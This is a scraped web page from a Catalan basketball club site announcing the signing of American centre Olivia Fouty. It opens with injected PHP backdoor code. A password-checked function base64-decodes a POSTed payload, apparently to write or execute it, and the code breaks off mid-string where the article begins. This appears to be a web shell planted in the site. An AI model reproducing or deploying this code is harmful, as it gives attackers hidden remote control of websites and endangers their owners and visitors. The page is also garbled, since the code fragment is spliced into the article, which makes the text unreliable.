function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet fitxa la pivot nord-americana Olivia Fouty - Tgn Bàsquet Club -

El TGN Bàsquet fitxa la pivot nord-americana Olivia Fouty

By
Updated: setembre 23, 2015

El TGN Bàsquet ha tancat el fitxatge de la pivot nord-americana Olivia Fouty (Toledo, Ohio, 28 de juny de 1992; 1m81) per reforçar el joc interior del seu conjunt sènior A, que juga a Copa Catalunya. Fouty es converteix d’aquesta manera en la primera nord-americana que vestirà la samarreta lila del TGN Bàsquet i arriba procedent de la Universitat Texas A&M Corpus Christi (Southland Conference, NCAA 1) on la temporada passada va fer unes estadístiques de 29 partits jugats, amb una mitjana d’11,7 punts (48,4% en tirs de dos, 25% triples i 69,9% en tirs lliures), 8,6 rebots i 1,4 assistències.

A la Southland Conference, vestint la samarreta de les Islanders (nom amb què es coneix Texas A&M Corpus Christi), Fouty va ser la quinzena màxima anotadora (11,7 punts) i la sisena màxima rebotejadora (8,6). Anteriorment, Olivia Fouty va jugar a la universitat d’Eastern Michigan (NCAA 1), on va aconseguir el campionat de la Mid-American Conference (MAC) el 2012, any en què es va convertir en la quarta màxima rebotejadora d’aquesta conferència. Amb les Eagles va fer unes estadístiques el curs 2013-2014 de 30 partits jugats amb una mitjana de 26,6 minuts, 10,6 punts (45% tirs de dos, 27% triples i 68% tirs lliures) i 8,2 rebots.

“Olivia Fouty ha de ser el nostre referent interior. És una jugadora que té bons moviments d’esquena al cèrcol però també li agrada atacar des de l’exterior, on la seva potència la fa imparable. Té bon canell i sap trobar els llançaments idonis. En defensa treballa amb el cos i reboteja amb facilitat”, analitza sobre la nord-americana el tècnic del TGN Bàsquet A Albert del Rey.

Es tracta d’una jugadora amb mentalitat guanyadora, com ho prova el fet que, després d’aconseguir el campionat de la MAC Conference el 2012 i fitxar el curs passat per Texas A&M Corpus Christi va afirmar: “El meu objectiu és guanyar el campionat de la Southland Conference, evidentment. Necessito un altre anell per la meva altra mà”. (Als Estats Units, tal com passa amb l’NBA, els guanyadors del bàsquet universitari reben un anell que els certifica com a campions).

Olivia Fouty ha arribat aquest matí a Tarragona i demà a la tarda farà el seu primer entrenament amb l’equip al pavelló del Sagrat Cor.

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *